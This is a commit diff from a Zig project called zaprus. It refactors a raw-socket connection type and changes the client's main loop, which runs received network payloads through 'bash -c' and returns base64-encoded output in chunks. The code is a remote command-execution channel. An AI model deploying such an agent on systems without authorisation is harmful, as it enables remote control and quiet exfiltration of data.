mirror of https://git.robbyzambito.me/zaprus
0.1.0
Commit: f554e7a3bb
@@ -10,7 +10,7 @@
 
 // This is a [Semantic Version](https://semver.org/).
 // In a future version of Zig it will be used for package deduplication.
-.version = "0.0.0",
+.version = "0.1.0",
 
 // Together with name, this represents a globally unique package
 // identifier. This field is generated by the Zig toolchain when the
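The comment retained in this hunk notes that .version is a Semantic Version. As a small standalone illustration (not part of the diff), the new value can be checked against the standard-library parser:

    const std = @import("std");

    test "0.1.0 parses as a semantic version" {
        const v = try std.SemanticVersion.parse("0.1.0");
        try std.testing.expectEqual(@as(usize, 0), v.major);
        try std.testing.expectEqual(@as(usize, 1), v.minor);
        try std.testing.expectEqual(@as(usize, 0), v.patch);
    }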
@@ -137,7 +137,7 @@ pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
 const RawSocket = @import("./RawSocket.zig");
 
 const SaprusMessage = @import("message.zig").Message;
-const SaprusConnection = @import("Connection.zig").Default;
+const SaprusConnection = @import("Connection.zig");
 const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
 
 const std = @import("std");
@@ -1,14 +1,10 @@
-pub fn Chunked(comptime cs: usize) type {
-return struct {
 socket: RawSocket,
 headers: EthIpUdp,
 connection: SaprusMessage,
 
-const Self = @This();
+const Connection = @This();
 
-pub const chunk_size = cs;
-
-pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Self {
+pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Connection {
 return .{
 .socket = socket,
 .headers = headers,
@@ -16,7 +12,7 @@ pub fn Chunked(comptime cs: usize) type {
 };
 }
 
-pub fn next(self: Self, io: Io, buf: []u8) ![]const u8 {
+pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
 _ = io;
 log.debug("Awaiting connection message", .{});
 const res = try self.socket.receive(buf);
@@ -29,7 +25,7 @@ pub fn Chunked(comptime cs: usize) type {
 return connection_res.payload;
 }
 
-pub fn send(self: *Self, io: Io, buf: []const u8) !void {
+pub fn send(self: *Connection, io: Io, buf: []const u8) !void {
 const io_source: std.Random.IoSource = .{ .io = io };
 const rand = io_source.interface();
 
@@ -43,7 +39,7 @@ pub fn Chunked(comptime cs: usize) type {
 self.headers.setPayloadLen(connection_bytes.len);
 
 var msg_buf: [2048]u8 = undefined;
-var msg_w: Io.Writer = .fixed(&msg_buf);
+var msg_w: Writer = .fixed(&msg_buf);
 try msg_w.writeAll(&self.headers.toBytes());
 try msg_w.writeAll(connection_bytes);
 const full_msg = msg_w.buffered();
@@ -53,91 +49,9 @@ pub fn Chunked(comptime cs: usize) type {
 log.debug("Sent {} byte connection message", .{full_msg.len});
 }
 
-pub const Writer = struct {
-connection: *Self,
-io: Io,
-interface: Io.Writer,
-err: ?anyerror,
-
-pub fn init(io: Io, connection: *Self, buf: []u8) Writer {
-return .{
-.connection = connection,
-.io = io,
-.interface = .{
-.vtable = &.{
-.drain = drain,
-},
-.buffer = buf,
-},
-.err = null,
-};
-}
-
-pub fn drain(io_w: *Io.Writer, data: []const []const u8, splat: usize) Io.Writer.Error!usize {
-_ = splat;
-const self: *Writer = @alignCast(@fieldParentPtr("interface", io_w));
-var res: usize = 0;
-
-// Get buffered data from the writer
-const buffered = io_w.buffered();
-var buf_offset: usize = 0;
-
-// Process buffered data in chunks
-while (buf_offset < buffered.len) {
-const current_chunk_size = @min(chunk_size, buffered.len - buf_offset);
-const chunk = buffered[buf_offset..][0..current_chunk_size];
-
-// Base64 encode the chunk
-var encoded_buf: [chunk_size * 2]u8 = undefined;
-const encoded_len = std.base64.standard.Encoder.calcSize(chunk.len);
-const encoded = std.base64.standard.Encoder.encode(&encoded_buf, chunk);
-
-// Send encoded chunk
-self.connection.send(self.io, encoded[0..encoded_len]) catch |err| {
-self.err = err;
-return error.WriteFailed;
-};
-self.io.sleep(.fromMilliseconds(40), .boot) catch @panic("honk shoo");
-
-buf_offset += current_chunk_size;
-res += current_chunk_size;
-}
-
-// Process data slices
-for (data) |slice| {
-var slice_offset: usize = 0;
-
-while (slice_offset < slice.len) {
-const current_chunk_size = @min(chunk_size, slice.len - slice_offset);
-const chunk = slice[slice_offset..][0..current_chunk_size];
-
-// Base64 encode the chunk
-var encoded_buf: [chunk_size * 2]u8 = undefined;
-const encoded_len = std.base64.standard.Encoder.calcSize(chunk.len);
-const encoded = std.base64.standard.Encoder.encode(&encoded_buf, chunk);
-
-// Send encoded chunk
-self.connection.send(self.io, encoded[0..encoded_len]) catch |err| {
-self.err = err;
-return error.WriteFailed;
-};
-self.io.sleep(.fromMilliseconds(40), .boot) catch @panic("honk shoo");
-
-slice_offset += current_chunk_size;
-res += current_chunk_size;
-}
-}
-
-return res;
-}
-};
-};
-}
-
-pub const Default = Chunked(RawSocket.max_payload_len);
-
 const std = @import("std");
 const Io = std.Io;
+const Writer = std.Io.Writer;
 
 const log = std.log;
 
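Taken together, the hunks above flatten the comptime-parameterized Chunked(cs) wrapper into a plain file-level Connection struct and drop the chunking Io.Writer adapter. A minimal usage sketch of the refactored API, using only the signatures and imports visible in this diff (the example function itself is hypothetical, and socket, headers, and msg are assumed to be built elsewhere in the project):

    const std = @import("std");
    const Connection = @import("Connection.zig");
    const RawSocket = @import("./RawSocket.zig");
    const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
    const SaprusMessage = @import("message.zig").Message;

    fn example(io: std.Io, socket: RawSocket, headers: EthIpUdp, msg: SaprusMessage) !void {
        // Build a connection from its three parts, in the field order shown above.
        var conn = Connection.init(socket, headers, msg);

        // send takes *Connection, so conn must be mutable.
        try conn.send(io, "hello");

        // next fills a caller-provided buffer and returns the received payload slice.
        var buf: [2048]u8 = undefined;
        const payload = try conn.next(io, &buf);
        _ = payload;
    }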
@@ -46,7 +46,7 @@ export fn zaprus_connect(
 const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
 const zc = c orelse return null;
 
-const connection = alloc.create(zaprus.Connection.Default) catch return null;
+const connection = alloc.create(zaprus.Connection) catch return null;
 connection.* = zc.connect(io, payload[0..payload_len]) catch {
 alloc.destroy(connection);
 return null;
@@ -55,7 +55,7 @@
 }
 
 export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
-const c: ?*zaprus.Connection.Default = @ptrCast(@alignCast(connection));
+const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
 if (c) |zc| {
 alloc.destroy(zc);
 }
@@ -67,7 +67,7 @@ export fn zaprus_connection_next(
 capacity: usize,
 out_len: *usize,
 ) c_int {
-const c: ?*zaprus.Connection.Default = @ptrCast(@alignCast(connection));
+const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
 const zc = c orelse return 1;
 
 const result = zc.next(io, out[0..capacity]) catch return 1;
@@ -80,7 +80,7 @@ export fn zaprus_connection_send(
 payload: [*c]const u8,
 payload_len: usize,
 ) c_int {
-const c: ?*zaprus.Connection.Default = @ptrCast(@alignCast(connection));
+const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
 const zc = c orelse return 1;
 
 zc.send(io, payload[0..payload_len]) catch return 1;
src/main.zig (131 changed lines)
@@ -124,8 +124,8 @@ pub fn main(init: std.process.Init) !void {
 return;
 }
 
-var con_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
-var w: Writer = .fixed(&con_buf);
+var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
+var w: Writer = .fixed(&init_con_buf);
 try w.print("{b64}", .{flags.connect.?});
 
 if (flags.connect != null) {
@@ -142,8 +142,6 @@ pub fn main(init: std.process.Init) !void {
 
 log.debug("Connection started", .{});
 
-var connection_writer: zaprus.Connection.Default.Writer = .init(init.io, &connection, &con_buf);
-
 next_message: while (true) {
 var res_buf: [2048]u8 = undefined;
 try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
@@ -162,15 +160,57 @@ pub fn main(init: std.process.Init) !void {
 var child = std.process.spawn(init.io, .{
 .argv = &.{ "bash", "-c", connection_payload },
 .stdout = .pipe,
+.stderr = .ignore,
+.stdin = .ignore,
 }) catch continue;
 
 var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
 var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
 
-_ = child_output_reader.interface.stream(
-&connection_writer.interface,
-.limited(@TypeOf(connection_writer.connection.*).chunk_size * 10),
-) catch continue :next_message;
+var is_killed: std.atomic.Value(bool) = .init(false);
+var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
+defer _ = kill_task.cancel(init.io) catch {};
 
+var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
+var cmd_output: Writer = .fixed(&cmd_output_buf);
+
+// Maximum of 10 messages of output per command
+for (0..10) |_| {
+cmd_output.end = 0;
+
+child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
+error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
+error.EndOfStream => {
+cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
+if (cmd_output.end > 0) {
+connection.send(init.io, cmd_output.buffered()) catch |e| {
+log.debug("Failed to send connection chunk: {t}", .{e});
+continue :next_message;
+};
+}
+break;
+},
+};
+cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
+connection.send(init.io, cmd_output.buffered()) catch |err| {
+log.debug("Failed to send connection chunk: {t}", .{err});
+continue :next_message;
+};
+try init.io.sleep(.fromMilliseconds(40), .boot);
+} else {
+kill_task.cancel(init.io) catch {};
+killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
+log.debug("Failed to kill process??? {t}", .{err});
+continue :next_message;
+};
+}
+
+if (!is_killed.load(.monotonic)) {
+_ = child.wait(init.io) catch |err| {
+log.debug("Failed to wait for child: {t}", .{err});
+};
+}
 }
 }
 }
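One detail worth noting in the hunk above: cmd_output_buf is sized at SaprusClient.max_payload_len * 2, presumably because base64 output is larger than its input (4 output bytes per 3 input bytes, plus padding), so a 2x buffer comfortably holds the "{b64}"-formatted chunk. A small standalone sketch of that size relationship, using the same std.base64 encoder API that appears in the removed drain code earlier in this diff (the test itself is illustrative, not part of the commit):

    const std = @import("std");

    test "base64 output fits in a 2x buffer" {
        const input = "some raw command output";
        var encoded_buf: [input.len * 2]u8 = undefined;
        const encoded_len = std.base64.standard.Encoder.calcSize(input.len);
        const encoded = std.base64.standard.Encoder.encode(&encoded_buf, input);
        try std.testing.expect(encoded_len <= encoded_buf.len);
        try std.testing.expectEqual(encoded_len, encoded.len);
    }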
@@ -178,73 +218,14 @@ pub fn main(init: std.process.Init) !void {
 unreachable;
 }
 
-// const ConnectionWriter = struct {
-// connection: *zaprus.Connection,
-// io: std.Io,
-// interface: Writer,
-// err: ?anyerror,
-
-// pub fn init(io: std.Io, connection: *zaprus.Connection) ConnectionWriter {
-// return .{
-// .connection = connection,
-// .io = io,
-// .interface = .{},
-// };
-// }
-
-// pub fn drain(io_w: *Writer, data: []const []const u8, splat: usize) Writer.Error!usize {
-// var res: usize = 0;
-// const w: *ConnectionWriter = @alignCast(@fieldParentPtr("interface", io_w));
-// var buffered_reader: std.Io.Reader = .fixed(io_w.buffered());
-// const io = w.io;
-
-// // Collect the output in chunks
-// var output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
-// var output_writer: Writer = .fixed(&output_buf);
-// while (buffered_reader.end - buffered_reader.seek > SaprusClient.max_payload_len) {
-// output_writer.end = 0;
-// output_writer.print("{b64}", .{&buffered_reader.takeArray(SaprusClient.max_payload_len)});
-// self.connection.send(io, output_writer.buffered()) catch |err| {
-// self.err = err;
-// return error.WriteFailed;
-// };
-// res += SaprusClient.max_payload_len;
-// }
-// // accumulate the remainder of buffered and the data slices before writing b64 to the output_writer
-// var output_acc_buf: [SaprusClient.max_payload_len]u8 = undefined;
-// var output_acc_w: Writer = .fixed(&output_acc_buf);
-
-// // We can write the rest of buffered_reader to the output_writer because we know after
-// // the previous loop the maximum length of the remaining data is SaprusClient.max_payload_len.
-// output_writer.end = 0;
-// res += output_acc_w.write(buffered_reader.buffered()) catch unreachable;
-
-// for (data[0 .. data.len - 1]) |chunk| {
-// if (chunk.len < SaprusClient.max_payload_len - output_acc_w.end) {
-// res += output_acc_w.write(chunk) catch unreachable;
-// continue;
-// }
-// var chunk_reader: std.Io.Reader = .fixed(chunk);
-// while (chunk_reader.end - chunk_reader.seek > 0) {
-// res += chunk_reader.stream(
-// &output_acc_w,
-// .limited(SaprusClient.max_payload_len - output_acc_w.end),
-// ) catch unreachable;
-// if (SaprusClient.max_payload_len - output_acc_w.end == 0) {
-// output_writer.print("{b64}", .{output_acc_w.buffered()});
-// output_acc_w.end = 0;
-// self.connection.send(io, output_writer.buffered()) catch |err| {
-// self.err = err;
-// return error.WriteFailed;
-// };
-// output_writer.end = 0;
-// }
-// }
-// }
-
-// return res;
-// }
-// };
+fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
+io.sleep(duration, .boot) catch |err| switch (err) {
+error.Canceled => return,
+else => |e| return e,
+};
+is_killed.store(true, .monotonic);
+proc.kill(io);
+}
 
 fn parseDest(in: ?[]const u8) [4]u8 {
 if (in) |dest| {